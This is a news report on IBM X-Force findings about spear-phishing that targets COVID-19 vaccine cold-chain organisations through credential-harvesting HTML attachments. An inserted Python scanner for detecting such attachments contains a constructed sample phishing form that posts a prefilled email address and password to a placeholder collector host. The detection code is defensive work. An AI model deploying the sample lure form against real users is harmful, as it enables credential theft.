COVID-19 Vaccine Cold Chain Entities Remain Key Spear-Phishing Target

IBM X-Force released an update of its December COVID-19 Vaccine Cold Chain attacks, finding additional spear-phishing attacks targeting global entities.

Threat actors are continuing to target the COVID-19 vaccine cold chain, the means of delivering and storing vaccines at safe temperatures, with spear-phishing campaigns that leverage pharma and biomedical lures, according to a new IBM X-Force report.

The prime targets of the campaign are the transportation, healthcare, and IT and electronics sectors. Researchers also found the attackers targeting government agencies and vendors that support public health entities, among other targets.

The new research is an update of a December IBM X-Force report that shed light on widespread phishing tactics leveraged by cybercriminals against vaccine supply chain organizations and other healthcare entities.

IBM X-Force established a cyber task force at the beginning of the pandemic to track cyber threats targeting critical infrastructure organizations.

The first global phishing campaigns against cold storage supply chain members were discovered in September, initially tied to Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform (CCEOP) program.

The threat actors masqueraded as biomedical executives and targeted enterprise leadership members in the IT, finance, sales, and procurement departments, who would likely be involved with vaccine cold chain efforts.

The attackers sent the messages to multiple employees across the enterprise, with some messages purporting to be help or support pages of the targeted enterprise. Instead, the messages contained malicious HTML attachments that opened locally on the devices and prompted victims to enter user credentials for access.

This week’s update revealed the researchers have detected an additional 50 files tied to spear-phishing emails targeting at least 44 entities in 44 different countries, including the US and Canada.

“The expanded scope of precision targeting includes key organizations likely underpinning the transport, warehousing, storage and ultimate distribution of vaccines,” researchers explained. “Spear-phishing attempts were associated with multiple executive activities and other roles.”

Specifically, the threat actors are targeting CEOs, purchasing managers, system administrators, presidents, heads of supply and logistics, finance directors, HR officers, and a host of other leaders within the enterprise organization.

IBM researchers first observed the latest campaign directly following the publication of the previous report. The malicious email was addressed to a German pharmaceutical and bioscience solutions company working on vaccine production and associated activities.

The target also appeared to be a client of one of the original targets detected in the initial campaign.

Much like the previously disclosed campaigns, the attackers are impersonating an executive from Haier Biomedical, one of China’s largest biomedical companies, which describes itself as the only complete cold chain vendor.

The researchers found a range of features that demonstrated the attackers have in-depth knowledge of the cold chain with an established attack pattern. As such, the spear-phishing campaigns remain a “deliberate and calculated threat.”

“Both the email subject and contents discuss requests for quotes regarding the Cold Chain Equipment Optimization Platform (CCEOP) program and contain references to specific products (a specific solar-powered vaccine refrigerator and ice-lined refrigerator) from Haier Biomedical’s product line to store and transport vaccines at the same temperatures of the COVID-19 vaccine,” researchers explained.

The malicious HTML files contained in the emails mention entities tied to solar panel manufacturing and petrochemical production, which align with the cold chain products.

Both campaigns used an overlapping command-and-control (C2) infrastructure and displayed the same blurred PDF with a login screen, prepopulated with the user’s email address as the ID.

When the victim enters their credentials, the credentials are immediately sent to a C2 server. Researchers concluded the campaigns are designed to steal credentials for future or secondary attacks.
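A defender-side check for the attachment pattern described above, added here as an example and not taken from the IBM report: it parses an HTML attachment and flags a password field, a form posting to a host outside the organization, a prefilled email address used as the login ID, and blurred decoy content. The sample HTML, the email address and the collector hostname are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling the lure: blurred "document" plus a login form
# prefilled with the recipient's address; the collector host is a placeholder.
SAMPLE_HTML = """<html><body>
<div style="filter: blur(4px)"><p>Request for quotation - CCEOP ice-lined refrigerator</p></div>
<form method="post" action="https://collector.example.invalid/auth.php">
  <input type="text" name="email" value="buyer@pharma.example">
  <input type="password" name="passwd">
  <input type="submit" value="Sign in to view document">
</form></body></html>"""


class CredentialFormScanner(HTMLParser):
    """Collects the indicators of a credential-harvesting HTML attachment."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.prefilled_emails = []
        self.blurred = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes become ""
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.password_fields += 1
            value = a.get("value", "")
            if "@" in value and "." in value.rsplit("@", 1)[-1]:
                self.prefilled_emails.append(value)
        if "blur(" in a.get("style", "").lower():
            self.blurred = True


def scan_attachment(html_text, trusted_hosts=()):
    """Return a list of findings; an empty list means no indicator matched."""
    scanner = CredentialFormScanner()
    scanner.feed(html_text)
    findings = []
    if scanner.password_fields:
        findings.append("password field in attachment")
    for action in scanner.form_actions:
        host = urlparse(action).hostname
        if host and host not in trusted_hosts:
            findings.append(f"form posts to external host {host}")
    if scanner.prefilled_emails:
        findings.append("email prefilled: " + ", ".join(scanner.prefilled_emails))
    if scanner.blurred:
        findings.append("blurred decoy content")
    return findings
```

The form-action check only covers forms that post directly; a page that submits credentials through script instead would need the script body inspected as well.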

The attackers may also be seeking privileged insights into the national procurement of vaccines, as well as the timelines for distribution and the expedited passage of vaccines across countries and territories. Researchers also suggested the campaigns aim to collect or copy electronic document submissions for pre-arrival processing, among other nefarious purposes.

IBM X-Force also provided indicators of compromise to support entities in monitoring for and detecting threats that target the cold chain. Healthcare entities should review previous spear-phishing guidance from Europol, which includes recommended technical measures.

“While clear attribution remains presently unavailable, the rise of ‘vaccine nationalism’ and increased global competition surrounding access to vaccines suggests the higher likelihood of a nation-state operation,” researchers explained.

“The COVID-19 pandemic has created an unprecedented race between rival nations on an unequal economic plane,” they added. “It is almost inevitable to see this type of adversarial activity in a threat landscape that is already extremely active on the nation-state attack front.”